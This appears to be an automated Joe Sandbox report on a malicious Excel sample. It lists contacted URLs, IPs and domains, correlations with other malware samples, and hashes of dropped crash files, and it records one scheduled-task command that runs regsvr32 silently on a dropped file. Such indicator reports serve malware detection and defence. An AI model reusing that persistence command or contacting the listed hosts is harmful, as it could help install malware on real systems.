                                                                                      https://wus2.contentsync.9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://incidents.diagnostics.office.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                        		high
                                                                                        https://clients.config.office.net/user/v1.0/ios9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                          		high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                            		high
                                                                                            https://o365auditrealtimeingestion.manage.office.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                              		high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                		high
                                                                                                https://api.office.net9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                  		high
                                                                                                  https://incidents.diagnosticssdf.office.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                    		high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                      		high
                                                                                                      https://entitlement.diagnostics.office.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                        		high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office.com/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                            		high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                              		high
                                                                                                              https://templatelogging.office.com/client/log9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                		high
                                                                                                                https://outlook.office365.com/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                  		high
                                                                                                                  https://webshell.suite.office.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                    		high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                      		high
                                                                                                                      https://management.azure.com/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorize9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                          		high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://graph.windows.net/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                            		high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                              		high
                                                                                                                              https://devnull.onenote.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                		high
                                                                                                                                https://ncus.pagecontentsync.9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://messaging.office.com/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://augloop.office.com/v29B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://skyapi.live.net/Activity/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://dataservice.o365filtering.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://api.cortana.ai9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://onedrive.live.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://directory.services.9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://staging.cortana.ai9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  192.185.39.58
                                                                                                                                                  		signifysystem.comUnited States
                                                                                                                                                  		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                  192.185.32.232
                                                                                                                                                  		fcventasyservicios.clUnited States
                                                                                                                                                  		46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:412182
                                                                                                                                                  Start date:12.05.2021
                                                                                                                                                  Start time:13:29:29
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 8m 47s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:9659e9a8_by_Libranalysis.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:33
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.expl.evad.winXLS@18/18@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 85.1% (good quality ratio 79.7%)
                                                                                                                                                  • Quality average: 81.4%
                                                                                                                                                  • Quality standard deviation: 28.5%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                  • TCP Packets have been reduced to 100

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  13:32:54Task SchedulerRun new task: frjwqvc path: regsvr32.exe s>-s "C:\Users\user\ritofm.cvm"

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  192.185.39.5846747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                    46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                      192.185.32.23246747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                        46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          signifysystem.com46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          fcventasyservicios.cl46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232

                                                                                                                                                          ASN

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          UNIFIEDLAYER-AS-1US46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.232.222.43
                                                                                                                                                          abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 67.20.76.71
                                                                                                                                                          Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.171.219
                                                                                                                                                          DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.169.22
                                                                                                                                                          dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.171.219
                                                                                                                                                          RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.129.32
                                                                                                                                                          Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.62.63
                                                                                                                                                          in.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.244.112
                                                                                                                                                          PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.144.13.239
                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 108.167.180.164
                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 108.167.180.164
                                                                                                                                                          export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 108.179.232.90
                                                                                                                                                          XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.190.216
                                                                                                                                                          QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 108.179.232.90
                                                                                                                                                          15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.115.105
                                                                                                                                                          e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.190.216
                                                                                                                                                          SOA PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.226.148
                                                                                                                                                          djBLaxEojp.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.161.67
                                                                                                                                                          UNIFIEDLAYER-AS-1US46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.232.222.43
                                                                                                                                                          abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 67.20.76.71
                                                                                                                                                          Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.171.219
                                                                                                                                                          DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.169.22
                                                                                                                                                          dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.171.219
                                                                                                                                                          RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.129.32
                                                                                                                                                          Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.62.63
                                                                                                                                                          in.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.244.112
                                                                                                                                                          PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.144.13.239
                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 108.167.180.164
                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 108.167.180.164
                                                                                                                                                          export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 108.179.232.90
                                                                                                                                                          XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.190.216
                                                                                                                                                          QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 108.179.232.90
                                                                                                                                                          15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.115.105
                                                                                                                                                          e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 162.241.190.216
                                                                                                                                                          SOA PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.226.148
                                                                                                                                                          djBLaxEojp.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.161.67

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          37f463bf4616ecd445d4a1937da06e1946747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          LMNF434.vbsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          rF27d1O1O2.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          cSvu8bTzJU.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          Contract_kyrgyzstan_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          SMC PO 1083 SAJ 1946 .exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          catalog-949138716.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          - FAX ID 74172012198198.htmGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          #Ud83d#Udd7b Missed Playback Recording.wav - 1424592794.htmGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          Cotizacii#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          Cotizaci#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          statistic-1310760242.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          Payment Slip.docxGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          Report000042.htmGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58
                                                                                                                                                          NewPO.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.185.32.232
                                                                                                                                                          • 192.185.39.58

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_68e15ffc7f9f5ac199eaf956335a58761f4230_7a325c51_0f165c5f\Report.wer
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11464
                                                                                                                                                          Entropy (8bit):3.774649044476038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:czcHHb6V6RiH/RS5uGXx3RjetB/u7svS274ItUz:ucH76VS6/RS5n3jez/u7svX4ItUz
                                                                                                                                                          MD5:39C8BF52118F2DF4E1400A3D41DE5A51
                                                                                                                                                          SHA1:E62C4BC8AF8B8FCE9E049E142A203B9C4199E3BB
                                                                                                                                                          SHA-256:B515576750DBB9CFE3CC594AEEE3644FE7D1FB8C0BFCC8C11C7B0A592EF0A9C5
                                                                                                                                                          SHA-512:699D4D43B3C0522510575F4426C6C6E664E657FAB82505CC9661A8F90B537B5741AC9D5057FE30B14F8CE3D33646C1A959E46196B4778575AC87165164188812
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.5.2.9.2.7.8.0.2.9.3.9.3.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.b.d.7.c.5.d.-.3.d.c.5.-.4.8.7.c.-.9.4.c.f.-.8.5.f.7.e.7.1.6.9.8.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.f.e.4.b.7.5.-.9.2.7.8.-.4.9.4.5.-.8.3.a.7.-.e.7.0.0.a.3.6.2.a.6.2.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.0.c.-.0.0.0.0.-.0.0.1.b.-.b.f.1.7.-.2.8.8.d.2.2.4.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_68e15ffc7f9f5ac199eaf956335a58761f4230_7a325c51_169b688f\Report.wer
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11468
                                                                                                                                                          Entropy (8bit):3.7748207749167326
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:65zctb6VrRiH/RS5uGXx3RjetB/u7s+S274ItUA:6tcZ6Vl6/RS5n3jez/u7s+X4ItUA
                                                                                                                                                          MD5:5847C220BB3FCE86D70761833080B730
                                                                                                                                                          SHA1:A4163C896D0E0757CCD535BAEBC12A2B86997D0D
                                                                                                                                                          SHA-256:D119B196266808913C896B2907FDFA19DD0B6BC191AEE69869A28F61CDB3346A
                                                                                                                                                          SHA-512:C29C5FE40E0C9135D04057D9D6EA232F05BDCD5A38C1D149EB4E74DF305127B0C70E73B2F5FA143A51F7C770C7D7BB2E1653A0A537F894F54F15A7FD3E9F9119
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.5.2.9.2.8.4.8.0.4.3.6.8.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.c.6.0.f.b.6.-.f.2.9.a.-.4.0.a.a.-.a.a.9.e.-.7.8.0.c.9.c.9.6.e.7.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.f.4.0.a.5.4.-.a.a.c.f.-.4.c.b.d.-.b.d.1.6.-.3.0.b.4.0.6.2.7.d.5.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.a.c.-.0.0.0.0.-.0.0.1.b.-.1.8.5.9.-.6.d.b.4.2.2.4.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CBF.tmp.dmp
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Wed May 12 11:33:02 2021, 0x1205a4 type
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35442
                                                                                                                                                          Entropy (8bit):2.5239486387082346
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:W4JnLfisbC1OUVml8P2tWD7ReNW+N8HLOglhLMEZmcv8hn39:pfisbkAAD7UHGJhLMdci39
                                                                                                                                                          MD5:DC850D1425AC809E1ACD975F4BAB694C
                                                                                                                                                          SHA1:B04B235D0D07FDC2E44307B53D9080695B62B3D7
                                                                                                                                                          SHA-256:BC6A8571B9AF3ECAEA069A8857280EC7BBB549A0ABF843E347EA048048BD98B3
                                                                                                                                                          SHA-512:F6BE9D6FD0B2422411A895BBFF14A1A32710D2FAA86C0B4FCB2C255B008964BA1D4397240ACB942F8F95CD87E131707D6D0ABE93B2A8FB7F27564FC30789EF41
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: MDMP....... ........`...................U...........B..............GenuineIntelW...........T............`.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER54FD.tmp.WERInternalMetadata.xml
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8250
                                                                                                                                                          Entropy (8bit):3.692711693602928
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:Rrl7r3GLNiiY6t6YEvSUlEgmfJdpSN+pBB89bHAsfrtm:RrlsNi96t6YESUmgmfJdpSlHTfM
                                                                                                                                                          MD5:D163A65497BA8EB6406341C11EE4B63D
                                                                                                                                                          SHA1:1FA2D678B7948135F4C862A33F4E3D92C92804D2
                                                                                                                                                          SHA-256:6F698E4440A6FBFB5847F7FD12D5311C6F379307F5B4313D492F9208DA172FB2
                                                                                                                                                          SHA-512:DCE1EE06BD8C5BEAD0865CB4F08E2684E23BC1AD8C574A058D32165FDAD54AE821F5F6262780D57F695CBC24666C9666CF6F92033130EEC17D1EEC6AB3798EC1
                                                                                                                                                          Malicious:false
